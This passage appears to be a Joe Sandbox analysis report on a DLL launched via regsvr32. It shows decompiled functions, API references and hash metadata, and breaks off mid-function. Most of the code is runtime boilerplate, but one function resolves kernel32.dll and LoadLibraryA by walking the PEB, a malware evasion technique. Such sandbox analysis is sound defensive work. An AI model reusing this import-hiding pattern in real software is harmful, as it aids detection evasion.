    • UnhandledExceptionFilter.KERNEL32(?), ref: 6E9E993B
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: bdf2bff44fedb95459b57ec19c1413db7c72c2c85e8b25c768b2b37574e95dfc
    • Instruction ID: 4379d27cb7055d54488a1f4e0907d7e99959702ae60cf3d104b3b67b57c1cd93
    • Opcode Fuzzy Hash: bdf2bff44fedb95459b57ec19c1413db7c72c2c85e8b25c768b2b37574e95dfc
    • Instruction Fuzzy Hash: 8B3105B5D052199BDF11DFA4D989BCDBBB8AF08304F1040EAE50DAB250EB709A888F54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E9CF7(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E6E9E9D4A(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0x6e9e0000;
    				 *((intOrPtr*)(__ecx + 4)) = 0x6e9e0000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0x6e9f53dc;
    				if(E6E9E5D50(__ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0x6e9fcb28 = 1;
    				}
    				return _t13;
    			}





    APIs
      • Part of subcall function 6E9E5D50: GetLastError.KERNEL32(?,?,?,6E9FA66C), ref: 6E9E5D74
    • IsDebuggerPresent.KERNEL32(?,?,6E9FA66C,?,?,?,?,?,?,?,00000000,?,6E9F46B0,000000FF,?,6E9E1E0A), ref: 6E9E9D2A
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,6E9FA66C,?,?,?,?,?,?,?,00000000,?,6E9F46B0,000000FF), ref: 6E9E9D39
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E9E9D34
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: DebugDebuggerErrorLastOutputPresentString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 389471666-631824599
    • Opcode ID: 56b374313c801ba88106d29ce0fb28828afe02c9e103f65152f013a778935887
    • Instruction ID: a00d1194fd87c407e007267839a63698ac295e5356b9c317b55cfb9c48d84ea3
    • Opcode Fuzzy Hash: 56b374313c801ba88106d29ce0fb28828afe02c9e103f65152f013a778935887
    • Instruction Fuzzy Hash: 67E039B0114711CAD3229FA8E4047827AE4AF06315F04885CE95ACAA00EBB0D889CF91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E6E9EC0A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
    				char _v0;
    				signed int _v8;
    				intOrPtr _v524;
    				intOrPtr _v528;
    				void* _v532;
    				intOrPtr _v536;
    				intOrPtr _v540;
    				intOrPtr _v544;
    				intOrPtr _v548;
    				intOrPtr _v552;
    				intOrPtr _v556;
    				intOrPtr _v560;
    				intOrPtr _v564;
    				intOrPtr _v568;
    				intOrPtr _v572;
    				intOrPtr _v576;
    				intOrPtr _v580;
    				intOrPtr _v584;
    				char _v724;
    				intOrPtr _v792;
    				intOrPtr _v800;
    				char _v804;
    				intOrPtr _v808;
    				char _v812;
    				void* __edi;
    				signed int _t40;
    				char* _t47;
    				intOrPtr _t49;
    				intOrPtr _t60;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				int _t67;
    				intOrPtr _t68;
    				signed int _t69;
    
    				_t68 = __esi;
    				_t65 = __edx;
    				_t60 = __ebx;
    				_t40 =  *0x6e9fc024; // 0x45ebcfb3
    				_t41 = _t40 ^ _t69;
    				_v8 = _t40 ^ _t69;
    				if(_a4 != 0xffffffff) {
    					_push(_a4);
    					E6E9E9954(_t41);
    					_pop(_t61);
    				}
    				E6E9EA330(_t66,  &_v804, 0, 0x50);
    				E6E9EA330(_t66,  &_v724, 0, 0x2cc);
    				_v812 =  &_v804;
    				_t47 =  &_v724;
    				_v808 = _t47;
    				_v548 = _t47;
    				_v552 = _t61;
    				_v556 = _t65;
    				_v560 = _t60;
    				_v564 = _t68;
    				_v568 = _t66;
    				_v524 = ss;
    				_v536 = cs;
    				_v572 = ds;
    				_v576 = es;
    				_v580 = fs;
    				_v584 = gs;
    				asm("pushfd");
    				_pop( *_t22);
    				_t23 =  &_v0; // 0x6e9fcd24
    				_v540 =  *_t23;
    				_t25 =  &_v0; // 0x6e9e4f85
    				_t49 = _t25;
    				_v528 = _t49;
    				_v724 = 0x10001;
    				_t28 = _t49 - 4; // 0xb804c483
    				_v544 =  *_t28;
    				_t30 =  &_a8; // 0x55cccccc
    				_v804 =  *_t30;
    				_t32 =  &_a12; // 0xec83ec8b
    				_v800 =  *_t32;
    				_t34 =  &_v0; // 0x6e9fcd24
    				_v792 =  *_t34;
    				_t67 = IsDebuggerPresent();
    				SetUnhandledExceptionFilter(0);
    				_t36 =  &_v812; // 0x6e9e4c59
    				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
    					_t38 =  &_a4; // 0xc35de58b
    					_push( *_t38);
    					_t57 = E6E9E9954(_t57);
    				}
    				_t39 =  &_v8; // 0x41d2
    				return E6E9E9ADF(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
    			}







































    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E9EC19B
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9EC1A5
    • UnhandledExceptionFilter.KERNEL32(6E9E4C59,?,?,?,?,?,?), ref: 6E9EC1B2
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: af47a0ff78d8b7904cae9d76f296d2cf6ac6508ba34339cda8bfa863807f4a04
    • Instruction ID: 799548de309bab89fcb77cd075c75e19c3092dffc70484bd4b9240d3c0e7f296
    • Opcode Fuzzy Hash: af47a0ff78d8b7904cae9d76f296d2cf6ac6508ba34339cda8bfa863807f4a04
    • Instruction Fuzzy Hash: 2D310671901329ABCB61DF64D888BCDBBB8BF18310F5041DAE51CAB250E7709F858F44
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EC865(int _a4) {
    				void* _t14;
    
    				if(E6E9EE9B4(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
    					TerminateProcess(GetCurrentProcess(), _a4);
    				}
    				E6E9EC8EA(_t14, _a4);
    				ExitProcess(_a4);
    			}





    APIs
    • GetCurrentProcess.KERNEL32(?,?,6E9EC864,?,00000001,?,?), ref: 6E9EC887
    • TerminateProcess.KERNEL32(00000000,?,6E9EC864,?,00000001,?,?), ref: 6E9EC88E
    • ExitProcess.KERNEL32 ref: 6E9EC8A0
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 4e76e5e6924bc1bc8a31ad3c488db971cccdd878e9bf1234810bb6f98c2bae6d
    • Instruction ID: 024b2e953991d1b603c5d15b845cab8bb2f5d94298a8a3a0d994e32bf42a8700
    • Opcode Fuzzy Hash: 4e76e5e6924bc1bc8a31ad3c488db971cccdd878e9bf1234810bb6f98c2bae6d
    • Instruction Fuzzy Hash: BDE0B631414988AFCF426B94DA58A983FADFF81645B054824FA4A8A520EB39ED51DEC4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9E1490(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				char _v5;
    				intOrPtr* _v12;
    				intOrPtr* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _t44;
    
    				_v24 = 0xc;
    				_v32 = 0x10;
    				_v36 = 0x10;
    				_v20 =  *[fs:0x30];
    				_v28 =  *((intOrPtr*)(_v20 + _v24));
    				_v16 =  *((intOrPtr*)(_v28 + _v32));
    				_v56 =  *((intOrPtr*)(_v16 + _v36));
    				_v12 = _v16;
    				while(1) {
    					_v12 =  *_v12;
    					_t44 = _v12;
    					_t75 =  *((intOrPtr*)(_t44 + 0x18));
    					if( *((intOrPtr*)(_t44 + 0x18)) != 0 && E6E9E1270( &_v5, _t75, _v12 + 0x30, L"kernel32.dll") == 0) {
    						break;
    					}
    					__eflags = _v16 - _v12;
    					if(__eflags != 0) {
    						continue;
    					}
    					L5:
    					_v44 =  *((intOrPtr*)(_v12 + 0x18));
    					_v40 = E6E9E8C90("LoadLibraryA", 0xc, 0xa);
    					 *0x6e9fc958 = E6E9E1640(_v44, _v40, 0xc, 0xa);
    					_v48 = E6E9E1580(_a8, _a8);
    					_v52 = E6E9E1640(_v48, _a4, _a12, _a16);
    					return _v52;
    				}
    				goto L5;
    			}


















    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: LoadLibraryA$kernel32.dll
    • API String ID: 0-2572683754
    • Opcode ID: 160f1a22af0d27670abfc6bde6b13eda3a8e8a2831bb645dd0b47e84f29fa563
    • Instruction ID: 4fc653c7700c868fe6510c35324a37f74eb8e52a94f946b1cbaef3543aad64b4
    • Opcode Fuzzy Hash: 160f1a22af0d27670abfc6bde6b13eda3a8e8a2831bb645dd0b47e84f29fa563
    • Instruction Fuzzy Hash: AF31C374E00208EFDB04CFD9C880AEEBBB5BF89304F108559E615AB754D730AA45CF94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9F3EB6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
    				signed int _t172;
    				signed int _t175;
    				signed int _t178;
    				signed int* _t179;
    				signed char _t193;
    				signed int _t196;
    				signed int _t200;
    				signed int _t203;
    				void* _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t211;
    				signed int _t226;
    				unsigned int* _t241;
    				signed char _t243;
    				signed int* _t251;
    				unsigned int* _t257;
    				signed int* _t258;
    				signed char _t260;
    				long _t263;
    				signed int* _t266;
    
    				 *(_a4 + 4) = 0;
    				_t263 = 0xc000000d;
    				 *(_a4 + 8) = 0;
    				 *(_a4 + 0xc) = 0;
    				_t243 = _a12;
    				if((_t243 & 0x00000010) != 0) {
    					_t263 = 0xc000008f;
    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
    				}
    				if((_t243 & 0x00000002) != 0) {
    					_t263 = 0xc0000093;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
    				}
    				if((_t243 & 0x00000001) != 0) {
    					_t263 = 0xc0000091;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
    				}
    				if((_t243 & 0x00000004) != 0) {
    					_t263 = 0xc000008e;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
    				}
    				if((_t243 & 0x00000008) != 0) {
    					_t263 = 0xc0000090;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
    				}
    				_t266 = _a8;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
    				_t260 = E6E9F38E5(_a4);
    				if((_t260 & 0x00000001) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
    				}
    				if((_t260 & 0x00000004) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
    				}
    				if((_t260 & 0x00000008) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
    				}
    				if((_t260 & 0x00000010) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
    				}
    				if((_t260 & 0x00000020) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
    				}
    				_t172 =  *_t266 & 0x00000c00;
    				if(_t172 == 0) {
    					 *_a4 =  *_a4 & 0xfffffffc;
    				} else {
    					if(_t172 == 0x400) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffd | 1;
    						L26:
    						 *_t258 = _t226;
    						L29:
    						_t175 =  *_t266 & 0x00000300;
    						if(_t175 == 0) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
    							L35:
    							 *_t251 = _t178;
    							L36:
    							_t179 = _a4;
    							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
    							if(_a28 == 0) {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
    								 *((long long*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t255 = _a4;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
    								 *(_a4 + 0x50) =  *_t241;
    							} else {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t241 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
    								 *(_a4 + 0x50) =  *_t241;
    							}
    							E6E9F3851(_t255);
    							RaiseException(_t263, 0, 1,  &_a4);
    							_t257 = _a4;
    							_t193 = _t257[2];
    							if((_t193 & 0x00000010) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffe;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000008) != 0) {
    								 *_t266 =  *_t266 & 0xfffffffb;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000004) != 0) {
    								 *_t266 =  *_t266 & 0xfffffff7;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000002) != 0) {
    								 *_t266 =  *_t266 & 0xffffffef;
    								_t193 = _t257[2];
    							}
    							if((_t193 & 0x00000001) != 0) {
    								 *_t266 =  *_t266 & 0xffffffdf;
    							}
    							_t196 =  *_t257 & 0x00000003;
    							if(_t196 == 0) {
    								 *_t266 =  *_t266 & 0xfffff3ff;
    							} else {
    								_t207 = _t196 - 1;
    								if(_t207 == 0) {
    									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
    									L55:
    									 *_t266 = _t210;
    									L58:
    									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
    									if(_t200 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
    										L64:
    										 *_t266 = _t203;
    										L65:
    										if(_a28 == 0) {
    											 *_t241 = _t257[0x14];
    										} else {
    											 *_t241 = _t257[0x14];
    										}
    										return _t203;
    									}
    									_t204 = _t200 - 1;
    									if(_t204 == 0) {
    										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
    										goto L64;
    									}
    									_t203 = _t204 - 1;
    									if(_t203 == 0) {
    										 *_t266 =  *_t266 & 0xfffff3ff;
    									}
    									goto L65;
    								}
    								_t211 = _t207 - 1;
    								if(_t211 == 0) {
    									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
    									goto L55;
    								}
    								if(_t211 == 1) {
    									 *_t266 =  *_t266 | 0x00000c00;
    								}
    							}
    							goto L58;
    						}
    						if(_t175 == 0x200) {
    							_t251 = _a4;
    							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
    							goto L35;
    						}
    						if(_t175 == 0x300) {
    							 *_a4 =  *_a4 & 0xffffffe3;
    						}
    						goto L36;
    					}
    					if(_t172 == 0x800) {
    						_t258 = _a4;
    						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
    						goto L26;
    					}
    					if(_t172 == 0xc00) {
    						 *_a4 =  *_a4 | 0x00000003;
    					}
    				}
    			}

























    APIs
    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E9F3EB1,?,?,00000008,?,?,6E9F3B49,00000000), ref: 6E9F40E3
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ExceptionRaise
    • String ID:
    • API String ID: 3997070919-0
    • Opcode ID: 18db988838531f9f93388b7ebc2c987d74febbe3873d3a42121421e94759637c
    • Instruction ID: 24c820608a1bb22c66f8b19d4a1f62b62d5694c93de46927e96c7c6a903bc548
    • Opcode Fuzzy Hash: 18db988838531f9f93388b7ebc2c987d74febbe3873d3a42121421e94759637c
    • Instruction Fuzzy Hash: EAB17971220609DFEB04CF68C596B957BA0FF55364F258658E8A9CF2A1C336E993CF40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E6E9E9658(signed int __edx) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr _t60;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				signed int _t66;
    				signed int _t67;
    				signed int _t73;
    				intOrPtr _t74;
    				intOrPtr _t75;
    				intOrPtr* _t77;
    				signed int _t78;
    				intOrPtr* _t82;
    				signed int _t85;
    				signed int _t90;
    				intOrPtr* _t93;
    				signed int _t96;
    				signed int _t99;
    				signed int _t104;
    
    				_t90 = __edx;
    				 *0x6e9fcff0 =  *0x6e9fcff0 & 0x00000000;
    				 *0x6e9fc010 =  *0x6e9fc010 | 0x00000001;
    				if(IsProcessorFeaturePresent(0xa) == 0) {
    					L23:
    					return 0;
    				}
    				_v20 = _v20 & 0x00000000;
    				_push(_t74);
    				_t93 =  &_v40;
    				asm("cpuid");
    				_t75 = _t74;
    				 *_t93 = 0;
    				 *((intOrPtr*)(_t93 + 4)) = _t74;
    				 *((intOrPtr*)(_t93 + 8)) = 0;
    				 *(_t93 + 0xc) = _t90;
    				_v16 = _v40;
    				_v12 = _v28 ^ 0x49656e69;
    				_v8 = _v36 ^ 0x756e6547;
    				_push(_t75);
    				asm("cpuid");
    				_t77 =  &_v40;
    				 *_t77 = 1;
    				 *((intOrPtr*)(_t77 + 4)) = _t75;
    				 *((intOrPtr*)(_t77 + 8)) = 0;
    				 *(_t77 + 0xc) = _t90;
    				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
    					L9:
    					_t96 =  *0x6e9fcff4; // 0x2
    					L10:
    					_t85 = _v32;
    					_t60 = 7;
    					_v8 = _t85;
    					if(_v16 < _t60) {
    						_t78 = _v20;
    					} else {
    						_push(_t77);
    						asm("cpuid");
    						_t82 =  &_v40;
    						 *_t82 = _t60;
    						 *((intOrPtr*)(_t82 + 4)) = _t77;
    						 *((intOrPtr*)(_t82 + 8)) = 0;
    						_t85 = _v8;
    						 *(_t82 + 0xc) = _t90;
    						_t78 = _v36;
    						if((_t78 & 0x00000200) != 0) {
    							 *0x6e9fcff4 = _t96 | 0x00000002;
    						}
    					}
    					_t61 =  *0x6e9fc010; // 0x6f
    					_t62 = _t61 | 0x00000002;
    					 *0x6e9fcff0 = 1;
    					 *0x6e9fc010 = _t62;
    					if((_t85 & 0x00100000) != 0) {
    						_t63 = _t62 | 0x00000004;
    						 *0x6e9fcff0 = 2;
    						 *0x6e9fc010 = _t63;
    						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
    							asm("xgetbv");
    							_v24 = _t63;
    							_v20 = _t90;
    							_t104 = 6;
    							if((_v24 & _t104) == _t104) {
    								_t66 =  *0x6e9fc010; // 0x6f
    								_t67 = _t66 | 0x00000008;
    								 *0x6e9fcff0 = 3;
    								 *0x6e9fc010 = _t67;
    								if((_t78 & 0x00000020) != 0) {
    									 *0x6e9fcff0 = 5;
    									 *0x6e9fc010 = _t67 | 0x00000020;
    									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
    										 *0x6e9fc010 =  *0x6e9fc010 | 0x00000040;
    										 *0x6e9fcff0 = _t104;
    									}
    								}
    							}
    						}
    					}
    					goto L23;
    				}
    				_t73 = _v40 & 0x0fff3ff0;
    				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
    					_t99 =  *0x6e9fcff4; // 0x2
    					_t96 = _t99 | 0x00000001;
    					 *0x6e9fcff4 = _t96;
    					goto L10;
    				} else {
    					goto L9;
    				}
    			}































    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E9E966E
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: FeaturePresentProcessor
    • String ID:
    • API String ID: 2325560087-0
    • Opcode ID: 5e89ef757747ddb97d5717dcf390b595cf8c54da9f5e08eaaf2618cb1a40692d
    • Instruction ID: f510cd8d4c1f07cf4c806ea8436c2741e84a76b272c6735d47bb0411187e06c9
    • Opcode Fuzzy Hash: 5e89ef757747ddb97d5717dcf390b595cf8c54da9f5e08eaaf2618cb1a40692d
    • Instruction Fuzzy Hash: CE5198B1A246068BEB1ACF95E4817AEBBF4FF49304F1485AAC526EB340D375D940CF94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E6E9EED8A(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
    				signed int _v8;
    				signed int _v12;
    				union _FINDEX_INFO_LEVELS _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				signed int _v48;
    				struct _WIN32_FIND_DATAW _v604;
    				char _v605;
    				intOrPtr* _v612;
    				union _FINDEX_INFO_LEVELS _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				signed int _v628;
    				union _FINDEX_INFO_LEVELS _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				signed int _v640;
    				signed int _v644;
    				union _FINDEX_INFO_LEVELS _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				signed int _v664;
    				union _FINDEX_INFO_LEVELS _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t68;
    				signed int _t73;
    				signed int _t75;
    				char _t77;
    				signed char _t78;
    				signed int _t84;
    				signed int _t94;
    				signed int _t97;
    				union _FINDEX_INFO_LEVELS _t98;
    				union _FINDEX_INFO_LEVELS _t100;
    				intOrPtr* _t106;
    				signed int _t109;
    				intOrPtr _t116;
    				signed int _t118;
    				signed int _t121;
    				signed int _t123;
    				void* _t126;
    				union _FINDEX_INFO_LEVELS _t127;
    				void* _t128;
    				intOrPtr* _t130;
    				intOrPtr* _t133;
    				signed int _t135;
    				intOrPtr* _t138;
    				signed int _t143;
    				signed int _t149;
    				void* _t155;
    				signed int _t158;
    				intOrPtr _t160;
    				void* _t161;
    				void* _t165;
    				void* _t166;
    				signed int _t167;
    				signed int _t170;
    				void* _t171;
    				signed int _t172;
    				void* _t173;
    				void* _t174;
    
    				_push(__ecx);
    				_t133 = _a4;
    				_t2 = _t133 + 1; // 0x1
    				_t155 = _t2;
    				do {
    					_t68 =  *_t133;
    					_t133 = _t133 + 1;
    				} while (_t68 != 0);
    				_t158 = _a12;
    				_t135 = _t133 - _t155 + 1;
    				_v8 = _t135;
    				if(_t135 <=  !_t158) {
    					_push(__esi);
    					_t5 = _t158 + 1; // 0x1
    					_t126 = _t5 + _t135;
    					_t165 = E6E9EDC48(_t126, 1);
    					__eflags = _t158;
    					if(_t158 == 0) {
    						L7:
    						_push(_v8);
    						_t126 = _t126 - _t158;
    						_t73 = E6E9F2161(_t165 + _t158, _t126, _a4);
    						_t172 = _t171 + 0x10;
    						__eflags = _t73;
    						if(_t73 != 0) {
    							goto L12;
    						} else {
    							_t130 = _a16;
    							_t118 = E6E9EF185(_t130);
    							_v8 = _t118;
    							__eflags = _t118;
    							if(_t118 == 0) {
    								 *( *(_t130 + 4)) = _t165;
    								_t167 = 0;
    								_t14 = _t130 + 4;
    								 *_t14 =  *(_t130 + 4) + 4;
    								__eflags =  *_t14;
    							} else {
    								E6E9EDC0E(_t165);
    								_t167 = _v8;
    							}
    							E6E9EDC0E(0);
    							_t121 = _t167;
    							goto L4;
    						}
    					} else {
    						_push(_t158);
    						_t123 = E6E9F2161(_t165, _t126, _a8);
    						_t172 = _t171 + 0x10;
